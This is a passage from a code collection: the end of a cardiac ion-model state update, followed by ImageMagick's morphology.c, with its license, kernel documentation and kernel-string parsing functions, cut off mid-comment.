gold = sg;
sg = G_INF-(G_INF-sg)*exptaug;
if(sg>gold && (svolt)>-37.0)
sg=gold;
//update voltage
rDY_[0] = svolt + dt*(-sItot);
rDY_[11] = sfca;
rDY_[12] = sg;
rDY_[13] = Cai;
rDY_[14] = CaSR;
rDY_[15] = Nai;
rDY_[16] = Ki;
} |
morphology.c | /*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% M M OOO RRRR PPPP H H OOO L OOO GGGG Y Y %
% MM MM O O R R P P H H O O L O O G Y Y %
% M M M O O RRRR PPPP HHHHH O O L O O G GGG Y %
% M M O O R R P H H O O L O O G G Y %
% M M OOO R R P H H OOO LLLLL OOO GGG Y %
% %
% %
% MagickCore Morphology Methods %
% %
% Software Design %
% Anthony Thyssen %
% January 2010 %
% %
% %
% Copyright 1999-2011 ImageMagick Studio LLC, a non-profit organization %
% dedicated to making software imaging solutions freely available. %
% %
% You may not use this file except in compliance with the License. You may %
% obtain a copy of the License at %
% %
% http://www.imagemagick.org/script/license.php %
% %
% Unless required by applicable law or agreed to in writing, software %
% distributed under the License is distributed on an "AS IS" BASIS, %
% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. %
% See the License for the specific language governing permissions and %
% limitations under the License. %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% Morphology is the application of various kernels, of any size and even
% shape, to an image in various ways (typically binary, but not always).
%
% Convolution (weighted sum or average) is just one specific type of
% morphology. Just one that is very common for image blurring and sharpening
% effects. Not only 2D Gaussian blurring, but also 2-pass 1D blurring.
%
% This module provides not only a general morphology function, and the ability
% to apply more advanced or iterative morphologies, but also functions for the
% generation of many different types of kernel arrays from user-supplied
% arguments. Perhaps even the generation of a kernel from a small image.
*/
/*
Include declarations.
*/
#include "magick/studio.h"
#include "magick/artifact.h"
#include "magick/cache-view.h"
#include "magick/color-private.h"
#include "magick/enhance.h"
#include "magick/exception.h"
#include "magick/exception-private.h"
#include "magick/gem.h"
#include "magick/hashmap.h"
#include "magick/image.h"
#include "magick/image-private.h"
#include "magick/list.h"
#include "magick/magick.h"
#include "magick/memory_.h"
#include "magick/monitor-private.h"
#include "magick/morphology.h"
#include "magick/morphology-private.h"
#include "magick/option.h"
#include "magick/pixel-private.h"
#include "magick/prepress.h"
#include "magick/quantize.h"
#include "magick/registry.h"
#include "magick/semaphore.h"
#include "magick/splay-tree.h"
#include "magick/statistic.h"
#include "magick/string_.h"
#include "magick/string-private.h"
#include "magick/token.h"
#include "magick/utility.h"
/*
** The following test is for special floating point numbers of value NaN (not
** a number), that may be used within a Kernel Definition. NaN's are defined
** as part of the IEEE standard for floating point number representation.
**
** These are used as a Kernel value to mean that this kernel position is not
** part of the kernel neighbourhood for convolution or morphology processing,
** and thus should be ignored. This allows the use of 'shaped' kernels.
**
** The special property that two NaN's are never equal, even if they come
** from the same variable, allows you to test whether a value is the
** special NaN value.
**
** The macro IsNan() below is thus true only if the value given is NaN.
*/
#define IsNan(a) ((a)!=(a))
/*
Other global definitions used by module.
*/
static inline double MagickMin(const double x,const double y)
{
return( x < y ? x : y);
}
static inline double MagickMax(const double x,const double y)
{
return( x > y ? x : y);
}
#define Minimize(assign,value) assign=MagickMin(assign,value)
#define Maximize(assign,value) assign=MagickMax(assign,value)
/* Currently these are only internal to this module */
static void
CalcKernelMetaData(KernelInfo *),
ExpandMirrorKernelInfo(KernelInfo *),
ExpandRotateKernelInfo(KernelInfo *, const double),
RotateKernelInfo(KernelInfo *, double);
/* Quick function to find last kernel in a kernel list */
static inline KernelInfo *LastKernelInfo(KernelInfo *kernel)
{
while (kernel->next != (KernelInfo *) NULL)
kernel = kernel->next;
return(kernel);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% A c q u i r e K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% AcquireKernelInfo() takes the given string (generally supplied by the
% user) and converts it into a Morphology/Convolution Kernel. This allows
% users to specify a kernel from a number of pre-defined kernels, or to fully
% specify their own kernel for a specific Convolution or Morphology
% Operation.
%
% The kernel so generated can be any rectangular array of floating point
% values (doubles) with the 'control point' or 'pixel being affected'
% anywhere within that array of values.
%
% Previously IM was restricted to a square of odd size using the exact
% center as origin. This is no longer the case, and any rectangular kernel
% with any position declared as the origin may be used. This in turn allows
% the use of highly asymmetrical kernels.
%
% The floating point values in the kernel can also include a special value
% known as 'nan' or 'not a number' to indicate that this value is not part
% of the kernel array. This allows you to shape the kernel within its
% rectangular area. That is, 'nan' values provide a 'mask' for the kernel
% shape. However at least one non-nan value must be provided for correct
% working of a kernel.
%
% The returned kernel should be freed using DestroyKernelInfo() when you
% are finished with it; do not free the memory directly yourself.
%
% Input kernel definition strings can consist of any of three types.
%
% "name:args[[@><]"
% Select from one of the built in kernels, using the name and
% geometry arguments supplied. See AcquireKernelBuiltIn()
%
% "WxH[+X+Y][@><]:num, num, num ..."
% a kernel of size W by H, with W*H floating point numbers following.
% The 'center' can optionally be defined at +X+Y (such that +0+0
% is the top left corner). If not defined, the pixel in the center, for
% odd sizes, or to the immediate top or left of center for even sizes,
% is automatically selected.
%
% "num, num, num, num, ..."
% list of floating point numbers defining an 'old style' odd sized
% square kernel. At least 9 values should be provided for a 3x3
% square kernel, 25 for a 5x5 square kernel, 49 for 7x7, etc.
% Values can be space or comma separated. This is not recommended.
%
% You can define a 'list of kernels' which can be used by some morphology
% operators. A list is defined as a semi-colon separated list of kernels.
%
% " kernel ; kernel ; kernel ; "
%
% Any extra ';' characters, at the start, end or between kernel definitions,
% are simply ignored.
%
% The special flags will expand a single kernel into a list of rotated
% kernels. A '@' flag will expand a 3x3 kernel into a list of 45-degree
% cyclic rotations, while a '>' will generate a list of 90-degree rotations.
% The '<' also expands using 90-degree rotations, but gives a 180-degree
% reflected kernel before the +/- 90-degree rotations, which can be important
% for Thinning operations.
%
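% For example (a sketch based on the flags above), the single specification
% "Sobel:0>" should expand to the same list as writing
% "Sobel:0; Sobel:90; Sobel:180; Sobel:270" explicitly.
%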
% Note that 'name' kernels will start with an alphabetic character while the
% new kernel specification has a ':' character in its specification string.
% If neither is the case, it is assumed an old style simple list of numbers
% generating an odd-sized square kernel has been given.
%
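% For example: "Octagon:3" selects a named kernel, "3: 0,1,0 1,-4,1 0,1,0"
% is a new-style kernel array, and "0,1,0,1,-4,1,0,1,0" is an old-style
% list generating a 3x3 square kernel.
%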
% The format of the AcquireKernelInfo method is:
%
% KernelInfo *AcquireKernelInfo(const char *kernel_string)
%
% A description of each parameter follows:
%
% o kernel_string: the Morphology/Convolution kernel wanted.
%
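% A hedged usage sketch (assuming the usual MagickCore setup):
%
%   KernelInfo
%     *kernel;
%
%   kernel = AcquireKernelInfo("3: 0,1,0 1,-4,1 0,1,0");
%   if (kernel != (KernelInfo *) NULL)
%     kernel = DestroyKernelInfo(kernel);
%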
*/
/* This was separated so that it could be used as a separate
** array input handling function, such as for -color-matrix
*/
static KernelInfo *ParseKernelArray(const char *kernel_string)
{
KernelInfo
*kernel;
char
token[MaxTextExtent];
const char
*p,
*end;
register ssize_t
i;
double
nan = sqrt((double)-1.0); /* Special Value : Not A Number */
MagickStatusType
flags;
GeometryInfo
args;
kernel=(KernelInfo *) AcquireMagickMemory(sizeof(*kernel));
if (kernel == (KernelInfo *)NULL)
return(kernel);
(void) ResetMagickMemory(kernel,0,sizeof(*kernel));
kernel->minimum = kernel->maximum = kernel->angle = 0.0;
kernel->negative_range = kernel->positive_range = 0.0;
kernel->type = UserDefinedKernel;
kernel->next = (KernelInfo *) NULL;
kernel->signature = MagickSignature;
/* find end of this specific kernel definition string */
end = strchr(kernel_string, ';');
if ( end == (char *) NULL )
end = strchr(kernel_string, '\0');
/* clear flags - for expanding kernel lists through rotations */
flags = NoValue;
/* Has a ':' in argument - New user kernel specification */
p = strchr(kernel_string, ':');
if ( p != (char *) NULL && p < end)
{
/* ParseGeometry() needs the geometry separated! -- Arrgghh */
memcpy(token, kernel_string, (size_t) (p-kernel_string));
token[p-kernel_string] = '\0';
SetGeometryInfo(&args);
flags = ParseGeometry(token, &args);
/* Size handling and checks of geometry settings */
if ( (flags & WidthValue) == 0 ) /* if no width then */
args.rho = args.sigma; /* then width = height */
if ( args.rho < 1.0 ) /* if width too small */
args.rho = 1.0; /* then width = 1 */
if ( args.sigma < 1.0 ) /* if height too small */
args.sigma = args.rho; /* then height = width */
kernel->width = (size_t)args.rho;
kernel->height = (size_t)args.sigma;
/* Offset Handling and Checks */
if ( args.xi < 0.0 || args.psi < 0.0 )
return(DestroyKernelInfo(kernel));
kernel->x = ((flags & XValue)!=0) ? (ssize_t)args.xi
: (ssize_t) (kernel->width-1)/2;
kernel->y = ((flags & YValue)!=0) ? (ssize_t)args.psi
: (ssize_t) (kernel->height-1)/2;
if ( kernel->x >= (ssize_t) kernel->width ||
kernel->y >= (ssize_t) kernel->height )
return(DestroyKernelInfo(kernel));
p++; /* advance beyond the ':' */
}
else
{ /* ELSE - Old style specification, forming an odd-square kernel */
/* count up number of values given */
p=(const char *) kernel_string;
while ((isspace((int) ((unsigned char) *p)) != 0) || (*p == '\''))
p++; /* ignore "'" chars for convolve filter usage - Cristy */
for (i=0; p < end; i++)
{
GetMagickToken(p,&p,token);
if (*token == ',')
GetMagickToken(p,&p,token);
}
/* set the size of the kernel - old sized square */
kernel->width = kernel->height= (size_t) sqrt((double) i+1.0);
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
p=(const char *) kernel_string;
while ((isspace((int) ((unsigned char) *p)) != 0) || (*p == '\''))
p++; /* ignore "'" chars for convolve filter usage - Cristy */
}
/* Read in the kernel values from rest of input string argument */
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
kernel->minimum = +MagickHuge;
kernel->maximum = -MagickHuge;
kernel->negative_range = kernel->positive_range = 0.0;
for (i=0; (i < (ssize_t) (kernel->width*kernel->height)) && (p < end); i++)
{
GetMagickToken(p,&p,token);
if (*token == ',')
GetMagickToken(p,&p,token);
if ( LocaleCompare("nan",token) == 0
|| LocaleCompare("-",token) == 0 ) {
kernel->values[i] = nan; /* do not include this value in kernel */
}
else {
kernel->values[i] = StringToDouble(token);
( kernel->values[i] < 0)
? ( kernel->negative_range += kernel->values[i] )
: ( kernel->positive_range += kernel->values[i] );
Minimize(kernel->minimum, kernel->values[i]);
Maximize(kernel->maximum, kernel->values[i]);
}
}
/* sanity check -- no more values in kernel definition */
GetMagickToken(p,&p,token);
if ( *token != '\0' && *token != ';' && *token != '\'' )
return(DestroyKernelInfo(kernel));
#if 0
/* this was the old method of handling an incomplete kernel */
if ( i < (ssize_t) (kernel->width*kernel->height) ) {
Minimize(kernel->minimum, kernel->values[i]);
Maximize(kernel->maximum, kernel->values[i]);
for ( ; i < (ssize_t) (kernel->width*kernel->height); i++)
kernel->values[i]=0.0;
}
#else
/* Number of values for kernel was not enough - Report Error */
if ( i < (ssize_t) (kernel->width*kernel->height) )
return(DestroyKernelInfo(kernel));
#endif
/* check that we received at least one real (non-nan) value! */
if ( kernel->minimum == MagickHuge )
return(DestroyKernelInfo(kernel));
if ( (flags & AreaValue) != 0 ) /* '@' symbol in kernel size */
ExpandRotateKernelInfo(kernel, 45.0); /* cyclic rotate 3x3 kernels */
else if ( (flags & GreaterValue) != 0 ) /* '>' symbol in kernel args */
ExpandRotateKernelInfo(kernel, 90.0); /* 90 degree rotate of kernel */
else if ( (flags & LessValue) != 0 ) /* '<' symbol in kernel args */
ExpandMirrorKernelInfo(kernel); /* 90 degree mirror rotate */
return(kernel);
}
static KernelInfo *ParseKernelName(const char *kernel_string)
{
char
token[MaxTextExtent];
const char
*p,
*end;
GeometryInfo
args;
KernelInfo
*kernel;
MagickStatusType
flags;
ssize_t
type;
/* Parse special 'named' kernel */
GetMagickToken(kernel_string,&p,token);
type=ParseMagickOption(MagickKernelOptions,MagickFalse,token);
if ( type < 0 || type == UserDefinedKernel )
return((KernelInfo *)NULL); /* not a valid named kernel */
while (((isspace((int) ((unsigned char) *p)) != 0) ||
(*p == ',') || (*p == ':' )) && (*p != '\0') && (*p != ';'))
p++;
end = strchr(p, ';'); /* end of this kernel definition */
if ( end == (char *) NULL )
end = strchr(p, '\0');
/* ParseGeometry() needs the geometry separated! -- Arrgghh */
memcpy(token, p, (size_t) (end-p));
token[end-p] = '\0';
SetGeometryInfo(&args);
flags = ParseGeometry(token, &args);
#if 0
/* For Debugging Geometry Input */
fprintf(stderr, "Geometry = 0x%04X : %lg x %lg %+lg %+lg\n",
flags, args.rho, args.sigma, args.xi, args.psi );
#endif
/* special handling of missing values in input string */
switch( type ) {
/* Shape Kernel Defaults */
case UnityKernel:
if ( (flags & WidthValue) == 0 )
args.rho = 1.0; /* Default scale = 1.0, zero is valid */
break;
case SquareKernel:
case DiamondKernel:
case OctagonKernel:
case DiskKernel:
case PlusKernel:
case CrossKernel:
if ( (flags & HeightValue) == 0 )
args.sigma = 1.0; /* Default scale = 1.0, zero is valid */
break;
case RingKernel:
if ( (flags & XValue) == 0 )
args.xi = 1.0; /* Default scale = 1.0, zero is valid */
break;
case RectangleKernel: /* Rectangle - set size defaults */
if ( (flags & WidthValue) == 0 ) /* if no width then */
args.rho = args.sigma; /* then width = height */
if ( args.rho < 1.0 ) /* if width too small */
args.rho = 3; /* then width = 3 */
if ( args.sigma < 1.0 ) /* if height too small */
args.sigma = args.rho; /* then height = width */
if ( (flags & XValue) == 0 ) /* center offset if not defined */
args.xi = (double)(((ssize_t)args.rho-1)/2);
if ( (flags & YValue) == 0 )
args.psi = (double)(((ssize_t)args.sigma-1)/2);
break;
/* Distance Kernel Defaults */
case ChebyshevKernel:
case ManhattanKernel:
case OctagonalKernel:
case EuclideanKernel:
if ( (flags & HeightValue) == 0 ) /* no distance scale */
args.sigma = 100.0; /* default distance scaling */
else if ( (flags & AspectValue ) != 0 ) /* '!' flag */
args.sigma = QuantumRange/(args.sigma+1); /* maximum pixel distance */
else if ( (flags & PercentValue ) != 0 ) /* '%' flag */
args.sigma *= QuantumRange/100.0; /* percentage of color range */
break;
default:
break;
}
kernel = AcquireKernelBuiltIn((KernelInfoType)type, &args);
if ( kernel == (KernelInfo *) NULL )
return(kernel);
/* global expand to rotated kernel list - only for single kernels */
if ( kernel->next == (KernelInfo *) NULL ) {
if ( (flags & AreaValue) != 0 ) /* '@' symbol in kernel args */
ExpandRotateKernelInfo(kernel, 45.0);
else if ( (flags & GreaterValue) != 0 ) /* '>' symbol in kernel args */
ExpandRotateKernelInfo(kernel, 90.0);
else if ( (flags & LessValue) != 0 ) /* '<' symbol in kernel args */
ExpandMirrorKernelInfo(kernel);
}
return(kernel);
}
MagickExport KernelInfo *AcquireKernelInfo(const char *kernel_string)
{
KernelInfo
*kernel,
*new_kernel;
char
token[MaxTextExtent];
const char
*p;
size_t
kernel_number;
p = kernel_string;
kernel = NULL;
kernel_number = 0;
while ( GetMagickToken(p,NULL,token), *token != '\0' ) {
/* ignore extra or multiple ';' kernel separators */
if ( *token != ';' ) {
/* tokens starting with alpha are Named kernels */
if (isalpha((int) *token) != 0)
new_kernel = ParseKernelName(p);
else /* otherwise a user defined kernel array */
new_kernel = ParseKernelArray(p);
/* Error handling -- this is not proper error handling! */
if ( new_kernel == (KernelInfo *) NULL ) {
fprintf(stderr, "Failed to parse kernel number #%.20g\n",(double)
kernel_number);
if ( kernel != (KernelInfo *) NULL )
kernel=DestroyKernelInfo(kernel);
return((KernelInfo *) NULL);
}
/* initialise or append the kernel list */
if ( kernel == (KernelInfo *) NULL )
kernel = new_kernel;
else
LastKernelInfo(kernel)->next = new_kernel;
}
/* look for the next kernel in list */
p = strchr(p, ';');
if ( p == (char *) NULL )
break;
p++;
}
return(kernel);
}
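#if 0
/* A usage sketch, not part of the build: walks a multi-kernel list
** returned by AcquireKernelInfo(). Note that DestroyKernelInfo() frees
** the entire list, as relied upon by the error handling above.
*/
static void WalkKernelList(void)
{
  KernelInfo
    *k,
    *kernel;
  kernel = AcquireKernelInfo("Sobel;Sobel:90");
  if (kernel == (KernelInfo *) NULL)
    return;
  for (k = kernel; k != (KernelInfo *) NULL; k = k->next)
    fprintf(stderr, "kernel %.20gx%.20g origin %+.20g%+.20g\n",
      (double) k->width, (double) k->height, (double) k->x, (double) k->y);
  kernel = DestroyKernelInfo(kernel);
}
#endif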
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% A c q u i r e K e r n e l B u i l t I n %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% AcquireKernelBuiltIn() returns one of the 'named' built-in types of
% kernels used for special purposes such as gaussian blurring, skeleton
% pruning, and edge distance determination.
%
% They take a KernelType, and a set of geometry style arguments, which were
% typically decoded from a user supplied string, or from a more complex
% Morphology Method that was requested.
%
% The format of the AcquireKernelBuiltIn method is:
%
% KernelInfo *AcquireKernelBuiltIn(const KernelInfoType type,
% const GeometryInfo args)
%
% A description of each parameter follows:
%
% o type: the pre-defined type of kernel wanted
%
% o args: arguments defining or modifying the kernel
%
% Convolution Kernels
%
% Unity
% A No-Op or Scaling single element kernel.
%
% Gaussian:{radius},{sigma}
% Generate a two-dimensional gaussian kernel, as used by -gaussian.
% The sigma for the curve is required. The resulting kernel is
% normalized.
%
% If 'sigma' is zero, you get a single pixel on a field of zeros.
%
% NOTE: the 'radius' is optional, but if provided can limit (clip)
% the final size of the resulting kernel to a square 2*radius+1 in size.
% The radius should be at least 2 times that of the sigma value, or
% severe clipping and aliasing may result. If not given or set to 0 the
% radius will be determined so as to produce the best minimal error
% result, which is usually much larger than is normally needed.
%
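% In terms of the code below, the sampled values follow
% G(u,v) = exp(-(u*u+v*v)/(2*sigma^2)) / (2*PI*sigma^2)
% over the kernel neighbourhood, after which the kernel is normalized.
%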
% LoG:{radius},{sigma}
% "Laplacian of a Gaussian" or "Mexician Hat" Kernel.
% The supposed ideal edge detection, zero-summing kernel.
%
% An alternative to this kernel is to use a "DoG" with a sigma ratio of
% approx 1.6 (according to wikipedia).
%
% DoG:{radius},{sigma1},{sigma2}
% "Difference of Gaussians" Kernel.
% As "Gaussian" but with a gaussian produced by 'sigma2' subtracted
% from the gaussian produced by 'sigma1'. Typically sigma2 > sigma1.
% The result is a zero-summing kernel.
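%
% That is, DoG(u,v) = G[sigma1](u,v) - G[sigma2](u,v), matching the two
% accumulation passes in the code below.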
%
% Blur:{radius},{sigma}[,{angle}]
% Generates a 1-dimensional or linear gaussian blur, at the angle given
% (currently restricted to orthogonal angles). If a 'radius' is given the
% kernel is clipped to a width of 2*radius+1. The kernel can be rotated
% by a 90-degree angle.
%
% If 'sigma' is zero, you get a single pixel on a field of zeros.
%
% Note that two convolutions with two "Blur" kernels perpendicular to
% each other is equivalent to a far larger "Gaussian" kernel with the
% same sigma value, however it is much faster to apply. This is how the
% "-blur" operator actually works.
%
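% For example (a usage sketch), convolving with "Blur:0x2" and then with
% "Blur:0x2+90" (where '+90' supplies the rotation angle handled below)
% approximates a single "Gaussian:0x2" convolution, at far lower cost.
%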
% Comet:{width},{sigma},{angle}
% Blur in one direction only, much like how a bright object leaves
% a comet like trail. The kernel is actually half a gaussian curve.
% Adding two such blurs in opposite directions produces a Blur Kernel.
% The angle can be rotated in multiples of 90 degrees.
%
% Note that the first argument is the width of the kernel and not the
% radius of the kernel.
%
% # Still to be implemented...
% #
% # Filter2D
% # Filter1D
% # Set kernel values using a resize filter, and given scale (sigma)
% # Cylindrical or Linear. Is this possible with an image?
% #
%
% Named Constant Convolution Kernels
%
% All these are unscaled, zero-summing kernels by default. As such, for
% the non-HDRI version of ImageMagick, some form of normalization, user
% scaling, and biasing of the results is recommended, to prevent the
% resulting image being 'clipped'.
%
% The 3x3 kernels (most of these) can be circularly rotated in multiples of
% 45 degrees to generate the 8 angled variants of each of the kernels.
%
% Laplacian:{type}
% Discrete Laplacian Kernels, (without normalization)
% Type 0 : 3x3 with center:8 surrounded by -1 (8 neighbourhood)
% Type 1 : 3x3 with center:4 edge:-1 corner:0 (4 neighbourhood)
% Type 2 : 3x3 with center:4 edge:1 corner:-2
% Type 3 : 3x3 with center:4 edge:-2 corner:1
% Type 5 : 5x5 laplacian
% Type 7 : 7x7 laplacian
% Type 15 : 5x5 LoG (sigma approx 1.4)
% Type 19 : 9x9 LoG (sigma approx 1.4)
%
% Sobel:{angle}
% Sobel 'Edge' convolution kernel (3x3)
% | -1, 0, 1 |
% | -2, 0, 2 |
% | -1, 0, 1 |
%
% Roberts:{angle}
% Roberts convolution kernel (3x3)
% | 0, 0, 0 |
% | -1, 1, 0 |
% | 0, 0, 0 |
%
% Prewitt:{angle}
% Prewitt Edge convolution kernel (3x3)
% | -1, 0, 1 |
% | -1, 0, 1 |
% | -1, 0, 1 |
%
% Compass:{angle}
% Prewitt's "Compass" convolution kernel (3x3)
% | -1, 1, 1 |
% | -1,-2, 1 |
% | -1, 1, 1 |
%
% Kirsch:{angle}
% Kirsch's "Compass" convolution kernel (3x3)
% | -3,-3, 5 |
% | -3, 0, 5 |
% | -3,-3, 5 |
%
% FreiChen:{angle}
% The Frei-Chen Edge Detector is based on a kernel that is similar to
% the Sobel Kernel, but is designed to be isotropic. That is, it takes
% into account the distance of the diagonal in the kernel.
%
% | 1, 0, -1 |
% | sqrt(2), 0, -sqrt(2) |
% | 1, 0, -1 |
%
% FreiChen:{type},{angle}
%
% Frei-Chen Pre-weighted kernels...
%
% Type 0: default un-normalized version shown above.
%
% Type 1: Orthogonal Kernel (same as type 11 below)
% | 1, 0, -1 |
% | sqrt(2), 0, -sqrt(2) | / 2*sqrt(2)
% | 1, 0, -1 |
%
% Type 2: Diagonal form of Kernel...
% | 1, sqrt(2), 0 |
% | sqrt(2), 0, -sqrt(2) | / 2*sqrt(2)
% | 0, -sqrt(2), -1 |
%
% However this kernel is also at the heart of the FreiChen Edge Detection
% Process, which uses a set of 9 specially weighted kernels. These 9
% kernels are not normalized, but directly applied to the image. The
% results are then added together, to produce the intensity of an edge in
% a specific direction. The square root of the pixel value can then be
% taken as the cosine of the edge, and with at least 2 such runs at 90
% degrees from each other, both the direction and the strength of the edge
% can be determined.
%
% Type 10: All 9 of the following pre-weighted kernels...
%
% Type 11: | 1, 0, -1 |
% | sqrt(2), 0, -sqrt(2) | / 2*sqrt(2)
% | 1, 0, -1 |
%
% Type 12: | 1, sqrt(2), 1 |
% | 0, 0, 0 | / 2*sqrt(2)
% | 1, sqrt(2), 1 |
%
% Type 13: | sqrt(2), -1, 0 |
% | -1, 0, 1 | / 2*sqrt(2)
% | 0, 1, -sqrt(2) |
%
% Type 14: | 0, 1, -sqrt(2) |
% | -1, 0, 1 | / 2*sqrt(2)
% | sqrt(2), -1, 0 |
%
% Type 15: | 0, -1, 0 |
% | 1, 0, 1 | / 2
% | 0, -1, 0 |
%
% Type 16: | 1, 0, -1 |
% | 0, 0, 0 | / 2
% | -1, 0, 1 |
%
% Type 17: | 1, -2, 1 |
% | -2, 4, -2 | / 6
% | 1, -2, 1 |
%
% Type 18: | -2, 1, -2 |
% | 1, 4, 1 | / 6
% | -2, 1, -2 |
%
% Type 19: | 1, 1, 1 |
% | 1, 1, 1 | / 3
% | 1, 1, 1 |
%
% The first 4 are for edge detection, the next 4 are for line detection,
% and the last is to add an average component to the results.
%
% Using the special type '10' will return all 9 pre-weighted kernels
% as a multi-kernel list, so that you can use them directly (without
% normalization) with the special "-set option:morphology:compose Plus"
% setting to apply the full FreiChen Edge Detection Technique.
%
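% For example (a usage sketch), something like
%    -set option:morphology:compose Plus -morphology Convolve FreiChen:10
% should apply all 9 kernels and 'Plus' compose their results, as
% described above.
%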
% If 'type' is large it will be taken to be an actual rotation angle for
% the default FreiChen (type 0) kernel. As such FreiChen:45 will look
% like a Sobel:45 but with 'sqrt(2)' instead of '2' values.
%
% WARNING: The above was laid out as per
% http://www.math.tau.ac.il/~turkel/notes/edge_detectors.pdf
% But rotated 90 degrees so direction is from the left rather than the top.
% I have yet to find any secondary confirmation of the above. The only
% other source found was actual source code at
% http://ltswww.epfl.ch/~courstiv/exos_labos/sol3.pdf
% Neither paper defines the kernels in a way that looks logical or
% correct when taken as a whole.
%
% Boolean Kernels
%
% Diamond:[{radius}[,{scale}]]
% Generate a diamond shaped kernel with given radius to the points.
% The kernel size will again be radius*2+1 square, and defaults to
% radius 1, generating a 3x3 kernel that is slightly smaller than a square.
%
% Square:[{radius}[,{scale}]]
% Generate a square shaped kernel of size radius*2+1, and defaulting
% to a 3x3 (radius 1).
%
% Octagon:[{radius}[,{scale}]]
% Generate an octagonal shaped kernel of given radius and constant scale.
% Default radius is 3, producing a 7x7 kernel. A radius of 1 will result
% in a "Diamond" kernel.
%
% Disk:[{radius}[,{scale}]]
% Generate a binary disk, thresholded at the radius given; the radius
% may be a floating-point value. The final kernel size is
% floor(radius)*2+1 square. A radius of approximately 4.3 is the default.
%
% NOTE: At low radii, Disk kernels produce the same results as
% many of the previously defined kernels, but differ greatly at larger
% radii. Here is a table of equivalences...
% "Disk:1" => "Diamond", "Octagon:1", or "Cross:1"
% "Disk:1.5" => "Square"
% "Disk:2" => "Diamond:2"
% "Disk:2.5" => "Octagon"
% "Disk:2.9" => "Square:2"
% "Disk:3.5" => "Octagon:3"
% "Disk:4.5" => "Octagon:4"
% "Disk:5.4" => "Octagon:5"
% "Disk:6.4" => "Octagon:6"
% All other Disk shapes are unique to this kernel, but because a "Disk"
% is more circular when using a larger radius, using a larger radius is
% preferred over iterating the morphological operation.
%
% Rectangle:{geometry}
% Simply generate a rectangle of 1's with the size given. You can also
% specify the location of the 'control point', otherwise the closest
% pixel to the center of the rectangle is selected.
%
% Properly centered and odd sized rectangles work the best.
%
% Symbol Dilation Kernels
%
% These kernels are not good general morphological kernels, but are used
% more for highlighting and marking any single pixels in an image using
% a "Dilate" method, as appropriate.
%
% For the same reasons iterating these kernels does not produce the
% same result as using a larger radius for the symbol.
%
% Plus:[{radius}[,{scale}]]
% Cross:[{radius}[,{scale}]]
% Generate a kernel in the shape of a 'plus' or a 'cross', with
% each arm the length of the given radius (default 2).
%
% NOTE: "plus:1" is equivelent to a "Diamond" kernel.
%
% Ring:{radius1},{radius2}[,{scale}]
% A ring of the values given that falls between the two radii.
% Defaults to a ring of approximately 3 radius in a 7x7 kernel.
% This is the 'edge' pixels of the default "Disk" kernel.
% More specifically, "Ring" -> "Ring:2.5,3.5,1.0"
%
% Hit and Miss Kernels
%
% Peak:radius1,radius2
% Find any peak larger than the pixels that fall between the two radii.
% The default ring of pixels is as per "Ring".
% Edges
% Find flat orthogonal edges of a binary shape
% Corners
% Find 90 degree corners of a binary shape
% Diagonals:type
% A special kernel to thin the 'outside' of diagonals
% LineEnds:type
% Find end points of lines (for pruning a skeleton)
% Two types of line ends (default to both) can be searched for
% Type 0: All line ends
% Type 1: single kernel for 4-connected line ends
% Type 2: single kernel for simple line ends
% LineJunctions
% Find junctions of multiple lines (within a skeleton)
% Type 0: all line junctions
% Type 1: Y Junction kernel
% Type 2: Diagonal T Junction kernel
% Type 3: Orthogonal T Junction kernel
% Type 4: Diagonal X Junction kernel
% Type 5: Orthogonal + Junction kernel
% Ridges:type
% Find single pixel ridges or thin lines
% Type 1: Find single pixel thick lines and ridges
% Type 2: Find two pixel thick lines and ridges
% ConvexHull
% Octagonal Thickening Kernel, to generate convex hulls of 45 degrees
% Skeleton:type
% Traditional skeleton generating kernels.
% Type 1: Traditional Skeleton kernel (4 connected skeleton)
% Type 2: HIPR2 Skeleton kernel (8 connected skeleton)
% Type 3: Thinning skeleton based on a research paper by
% Dan S. Bloomberg (Default Type)
% ThinSE:type
% A huge variety of Thinning Kernels designed to preserve connectivity.
% Many other kernel sets use these kernels as source definitions.
% Type numbers are 41-49, 81-89, 481, and 482 which are based on
% the super and sub notations used in the source research paper.
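%
% For example, the "Skeleton:3" kernel above is built internally from the
% list "ThinSE:41; ThinSE:42; ThinSE:43", followed by a mirror expansion.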
%
% Distance Measuring Kernels
%
% Different types of distance measuring methods, which are used with the
% 'Distance' morphology method for generating a gradient based on
% distance from an edge of a binary shape, though there is a technique
% for handling an anti-aliased shape.
%
% See the 'Distance' Morphological Method for information on how it is
% applied.
%
% Chebyshev:[{radius}][x{scale}[%!]]
% Chebyshev Distance (also known as Tchebychev or Chessboard distance)
% is a value of one to any neighbour, orthogonal or diagonal. One way
% of thinking of it is the number of squares a 'King' or 'Queen' in
% chess needs to traverse to reach any other position on a chess board.
% It results in a 'square' like distance function, but one where
% diagonals are given a value that is closer than expected.
%
% Manhattan:[{radius}][x{scale}[%!]]
% Manhattan Distance (also known as Rectilinear, City Block, or the Taxi
% Cab distance metric), is the distance needed when you can only
% travel in horizontal or vertical directions. It is the
% distance a 'Rook' in chess would have to travel, and results in a
% diamond-like distance, where diagonals are further than expected.
%
% Octagonal:[{radius}][x{scale}[%!]]
% An interleaving of Manhattan and Chebyshev metrics, producing an
% increasing octagonally shaped distance. Distances match those of
% the "Octagon" shaped kernel of the same radius. The minimum radius
